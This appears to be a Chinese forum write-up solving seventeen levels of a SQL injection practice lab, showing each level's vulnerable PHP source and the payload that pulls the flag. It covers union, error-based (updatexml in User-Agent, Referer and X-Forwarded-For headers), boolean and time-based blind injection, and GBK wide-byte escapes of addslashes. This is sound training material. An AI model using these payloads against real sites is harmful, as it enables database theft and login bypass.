-
-
【封神台】Sql-Labs wp
-
发表于: 2021-8-5 13:44 1464
-
前言
- 掌控安全里面的靶场Sql-Labs,练练手!
- 环境:http://inject2.lab.aqlab.cn:81/
pass-01
1 2 3 4 5 6 7 8 9 10 11 12 | $username = ''; $password = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from user where id=' .$ id ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $username = $row[ 'username' ]; $password = $row[ 'password' ]; } echo 'Your Login name:' .$username; echo 'Your Password:' .$password; |
- 显错注入、先判断多少个字段
- 查表拓展: 1 and exists(select * from user)这种形式可以猜解表是否存在
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 01 / index.php? id = 1 union all select 1 , 2 ,group_concat(table_name) from information_schema.tables where table_schema = database(); |
- 查flag表中字段
1 2 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 01 / index.php? id = 1 union all select 1 , 2 ,group_concat(column_name) from f.columns where table_schema = database() and table_name = 0x6572726f725f666c6167 ; / / 0x6572726f725f666c6167 是error_flag的十六进制 |
- 拿flag //后面就不截图了
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 01 / index.php? id = 1 union all select 1 , 2 ,flag from error_flag; |
pass-02
1 2 3 4 5 6 7 8 9 10 11 12 | $username = ''; $password = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from user where id=' \' '.$id.' \''; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $username = $row[ 'username' ]; $password = $row[ 'password' ]; } echo 'Your Login name:' .$username; echo 'Your Password:' .$password; |
- 给id传参加了个单引号,和上题一样的做法差不多,就是1后面加个'来闭合源代码中的单引号,再加个#号url编码也就是%23注释掉后面的单引号,也就可以联合查询了
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 02 / index.php? id = 1 ' union all select 1 , 2 ,flag from error_flag % 23 ; |
pass-03
1 2 3 4 5 6 7 8 9 10 11 12 | sername = ''; $password = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from user where id=' (\' '.$id.' \ ')' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $username = $row[ 'username' ]; $password = $row[ 'password' ]; } echo 'Your Login name:' .$username; echo 'Your Password:' .$password; |
- 上题id是'id'这题是加了个括号('id'),不过意思不变,同样是进行构造')在1后面然后利用注释符#来绕过也就是%23
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 03 / index.php? id = 1 ') union all select 1 , 2 ,flag from error_flag % 23 ; |
pass-04
1 2 3 4 5 6 7 8 9 10 11 12 | $username = ''; $password = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from user where id=("' .$ id . '")' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $username = $row[ 'username' ]; $password = $row[ 'password' ]; } echo 'Your Login name:' .$username; echo 'Your Password:' .$password; |
- 单引号变双引号
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 04 / index.php? id = 1 ") union all select 1 , 2 ,flag from error_flag % 23 ; |
pass-05
1 2 3 4 5 6 7 8 9 10 11 12 | $username = $_POST[ 'username' ]; $password = $_POST[ 'password' ]; $sql = 'select *from user where username =\'' .$username. '\' and password=\'' .$password. '\'' ; mysqli_select_db($conn, '******' ); / / 不想告诉你们库名 $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); $uname = $row[ 'username' ]; $passwd = $row[ 'password' ]; if ($row){ echo '成功登录Your Login name:' .$uname. 'Your Password:' .$passwd.'';} else {echo '账号密码错误' ;} |
- 先用万能密码登陆,获取账号和密码,然后再post注入,利用联合查询生成其他的账号和密码使回显成功,最后用limit 1,1 显示第二行也就是我们联合查询加入进去的账号和密码,然后再注入和上面四题没区别
- 万能密码登陆
- 用Hackbard的post注入,找到回显点
1 | username = admin&password = as4dsa2dsad2a3' union all select 1 , 2 , 3 limit 1 , 1 # |
- 表
1 | username = admin&password = as4dsa2dsad2a3' union all select 1 , 2 ,group_concat(table_name) from information_schema.tables where table_schema = database() limit 1 , 1 # |
- 字段
1 | username = admin&password = as4dsa2dsad2a3 ' union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=' flag' limit 1 , 1 # |
- 拿flag
1 | username = admin&password = as4dsa2dsad2a3' union all select 1 , 2 ,flag from flag limit 1 , 1 # |
pass-06
1 2 3 4 5 6 7 8 9 10 11 12 | $username = $_POST[ 'username' ]; $password = $_POST[ 'password' ]; $sql = 'select *from user where username =("' .$username. '") and password=("' .$password. '")' ; mysqli_select_db($conn, '******' ); / / 不想告诉你们库名 $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); $uname = $row[ 'username' ]; $passwd = $row[ 'password' ]; if ($row){ echo '成功登录Your Login name:' .$uname. 'Your Password:' .$passwd.'';} else {echo '账号密码错误' ;} |
- 双引号后面加个括号
1 | username = admin&password = as4dsa2dsad2a3") union all select 1 , 2 ,flag from flag limit 1 , 1 # |
pass-07
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | $username = $_POST[ 'username' ]; $password = $_POST[ 'password' ]; $uagent = $_SERVER[ 'HTTP_USER_AGENT' ]; $jc = $username.$password; $sql = 'select *from user where username =\'' .$username. '\' and password=\'' .$password. '\'' ; if (preg_match( '/.*\'.*/' ,$jc)! = = 0 ){die( '为了网站安全性,禁止输入某些特定符号' );} mysqli_select_db($conn, '****' ); / / 不想告诉你库名 $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); $uname = $row[ 'username' ]; $passwd = $row[ 'password' ]; if ($row){ $Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')" ; $result1 = mysqli_query($conn,$Insql); print_r(mysqli_error($conn)); echo '成功登录' ; |
过滤了单引号,万能密码登陆没用了,看到user_agent的head头中被安插在插入语句中,可以直接sqlmap跑*加包,或者第二种方法用burp跑出密码登陆,再UA中填updatexml来报错直接页面上显示uA中语句错误,第一种方法无脑,就不做了
账号和密码是admin和123456,看源码得知,必须登陆才能执行user-agent下面的语句,$row必须不为空,所以想要报错注入,就必须能登陆成功
- 登陆成功抓个包
- 拼接一个完整的insert 并且在其中写一个updatexml报错注入
1 | ' or updatexml( 1 ,concat( 0x7e ,user()), 1 ), 1 ) # |
- 取表
1 | ' or updatexml( 1 ,concat( 0x7e ,(select table_name from information_schema.tables where table_schema = database() limit 0 , 1 )), 1 ), 1 ) # |
- 取字段和flag
1 | 'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=' flag_head')), 1 ), 1 ) # |
1 | ' or updatexml( 1 ,concat( 0x7e ,(select group_concat(flag_h1) from flag_head)), 1 ), 1 ) # |
pass-08
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | $username = $_POST[ 'username' ]; $password = $_POST[ 'password' ]; $uagent = $_SERVER[ 'HTTP_REFERER' ]; $jc = $username.$password; $sql = 'select *from user where username =\'' .$username. '\' and password=\'' .$password. '\'' ; if (preg_match( '/.*\'.*/' ,$jc)! = = 0 ){die( '为了网站安全性,禁止输入某些特定符号' );} mysqli_select_db($conn, '****' ); / / 不想告诉你库名 $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); $uname = $row[ 'username' ]; $passwd = $row[ 'password' ]; if ($row){ $Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')" ; $result1 = mysqli_query($conn,$Insql); print_r(mysqli_error($conn)); echo '成功登录' ; |
- 就是head头中user-agent的插入换成了refer
1 | Referer: ' or updatexml( 1 ,concat( 0x7e ,(select group_concat(flag_h1) from flag_head)), 1 ), 1 ) # |
pass-09
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | function getip() { if (getenv( 'HTTP_CLIENT_IP' )) { $ip = getenv( 'HTTP_CLIENT_IP' ); } elseif (getenv( 'HTTP_X_FORWARDED_FOR' )) { $ip = getenv( 'HTTP_X_FORWARDED_FOR' ); } elseif (getenv( 'HTTP_X_FORWARDED' )) { $ip = getenv( 'HTTP_X_FORWARDED' ); } elseif (getenv( 'HTTP_FORWARDED_FOR' )) { $ip = getenv( 'HTTP_FORWARDED_FOR' ); } elseif (getenv( 'HTTP_FORWARDED' )) { $ip = getenv( 'HTTP_FORWARDED' ); } else { $ip = $_SERVER[ 'REMOTE_ADDR' ]; } return $ip; } $username = $_POST[ 'username' ]; $password = $_POST[ 'password' ]; $ip = getip(); $jc = $username.$password; $sql = 'select *from user where username =\'' .$username. '\' and password=\'' .$password. '\'' ; if (preg_match( '/.*\'.*/' ,$jc)! = = 0 ){die( '为了网站安全性,禁止输入某些特定符号' );} mysqli_select_db($conn, '****' ); / / 不想告诉你库名 $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); $uname = $row[ 'username' ]; $passwd = $row[ 'password' ]; if ($row){ $Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')" ; $result1 = mysqli_query($conn,$Insql); print_r(mysqli_error($conn)); echo '成功登录' ; |
- head头中记录我们访问ip的是X-FORWARDED-FOR,因为head头中有时是不显示的,我们自己加一个
1 | X - FORWARDED - FOR: ' or updatexml( 1 ,concat( 0x7e ,(select group_concat(flag_h1) from flag_head)), 1 ), 1 ) # |
pass-10
1 2 3 4 5 6 7 8 9 10 | $news = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from news where id=' .$ id ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $news = $row[ 'news' ]; } if ($news! = = ''){ echo '有数据' ;} |
length函数:
1length(字符串内容)
这个函数主要是用来测试字符串长度用,在盲注中是用来判断当前查询的字符串长度,例如数据库名,表名的长度。
substr函数:
1SUBSTR(字符串内容,从哪截取,截取多长)
用于分割字符串,将字符串分割成单个,配合ASCII码测试单个字符到底是什么字符。
ascii函数:
1ascii(填入字符)
返回字符的ascii码,将字符转变为数字,将字符都转变为数字,可利用数字大小趋向的特性进行大小比较,从而迅速判断出准确的字符内容。
- 先用length判断数据库名
- 再用substr从第一个字符的ascii码开始判断他为什么
- 我拿起手中的burp来跑起,12字符快
- 按从1到12的顺序把ascii码写下来准备解码
1 | 107 97 110 119 111 108 111 110 103 120 105 97 |
- 了解原理就好了,菜B的我还是sqlmap好用,暂时python脚本还不太会写
pass-11
1 2 3 4 5 6 7 8 9 10 | $news = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from news where id="' .$ id . '"' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $news = $row[ 'news' ]; } if ($news! = = ''){ echo '有数据' ;} |
- 原理和上题一模一样就是需要加个单引号和末尾加个注释符%23也就是#
pass-12
1 2 3 4 5 6 7 8 9 10 11 12 | $username = $_POST[ 'username' ]; $password = $_POST[ 'password' ]; $sql = 'select *from user where username =\'' .$username. '\' and password=\'' .$password. '\'' ; mysqli_select_db($conn, '******' ); / / 不想告诉你们库名 $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); $uname = $row[ 'username' ]; $passwd = $row[ 'password' ]; if ($row){ echo '成功登录' ;} else {echo '账号密码错误' ;} |
- 换了个传参方式,但是原理不变
pass-13
1 2 3 4 5 6 7 8 9 | $news = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from news where id="' .$ id . '"' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $news = $row[ 'news' ]; } echo '有数据' ; |
- 时间盲注的判断方式也是布尔盲注的一种
(1)、if(条件,满足条件的返回,不满足田间的返回)
(2)、sleep(X):休眠X秒
- 判断数据库的长度
- 判断数据库的值用substr和ascii
1 | 1 " and if (ascii(substr(database(), 1 , 1 ))> 1 ,sleep( 1 ), 1 ) % 23 |
- 抓包,然后和布尔盲注是一样的操作,理解原理就行
pass-14
1 2 3 4 5 6 7 8 9 | $news = ''; @$ id = $_GET[ 'id' ]; @$sql = 'select *from news where id=(\'' .$ id . '\')' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $news = $row[ 'news' ]; } echo '有数据' ; |
- 和上题一模一样,除了"双引号换成')
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 14 / index.php? id = 1 ') and if (ascii(substr(database(), 1 , 1 ))> 1 ,sleep( 5 ), 1 ) % 23 |
pass-15
1 2 3 4 5 6 7 8 9 10 11 12 13 | $username = ''; $password = ''; @$ id = addslashes($_GET[ 'id' ]); @$sql = 'select *from user where id=\'' .$ id . '\'' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 mysqli_query($conn, "SET NAMES gbk" ); $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $username = $row[ 'username' ]; $password = $row[ 'password' ]; } echo 'Your Login name:' .$username; echo 'Your Password:' .$password; |
- 可以发现有addslashes函数导致我们输入的一些单双引号前面加了个右斜线\,由于右斜线的url编码是%5c,%df%5c会组成一个特殊汉字来进行逃逸,
- 因为GBK编码默认两个字符为一个汉字, 我们可以通过输入宽字符%df使反斜杠和这个%df形成一个汉字,这样后面的单引号就不会被转义而达到逃逸的效果
- 输入%df逃逸斜线
- 接着判断字段长度、等拿flag和第一题一样
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 15 / index.php? id = 1 % df' union all select 1 , 2 , 3 % 23 |
pass-16
1 2 3 4 5 6 7 8 9 10 11 12 13 | $username = ''; $password = ''; @$ id = addslashes($_GET[ 'id' ]); @$sql = 'select *from user where id=("' .$ id . '")' ; mysqli_select_db($conn, '****' ); / / 不想让你们知道库名 mysqli_query($conn, "SET NAMES gbk" ); $result = mysqli_query($conn,$sql); while ($row = mysqli_fetch_array($result)){ $username = $row[ 'username' ]; $password = $row[ 'password' ]; } echo 'Your Login name:' .$username; echo 'Your Password:' .$password; |
- 和上题区别不大,就是加了“)的形式
1 | http: / / inject2.lab.aqlab.cn: 81 / Pass - 16 / index.php? id = 1 % df") union all select 1 , 2 , 3 % 23 |
pass-17
1 2 3 4 5 6 7 8 9 10 | $username = addslashes($_POST[ 'username' ]); $password = addslashes($_POST[ 'password' ]); $sql = 'select *from user where username =(\'' .$username. '\') and password=(\'' .$password. '\')' ; mysqli_select_db($conn, '******' ); / / 不想告诉你们库名 mysqli_query($conn, "SET NAMES gbk" ); $result = mysqli_query($conn,$sql); $row = mysqli_fetch_array($result); if ($row){ echo '成功登录' ;} else {echo '账号密码错误' ;} |
- 这题是个盲注,但是我还是说一下,post传参由于没有url解码,所以宽字节注入得换个参数,比如“汉”这个字和右下划线组成一个汉字也是可以逃逸的。
- 成功逃逸
- 因为是盲注所以嘿嘿,抓包,存123.txt,注意:一定要抓我们自己成功构造登陆的形式加*来让sqlmap跑,不然可能跑不出来
- sqlmap跑的形式
我的个人博客
孤桜懶契:http://gylq.github.io
最后于 2021-8-5 13:46
被孤桜懶契编辑
,原因:
赞赏
他的文章
- 【封神台】前端渗透 XSS wp 2524
- 【封神台】Upload-Labs wp 1701
- 【封神台】Sql-Labs wp 1465
看原图
赞赏
雪币:
留言: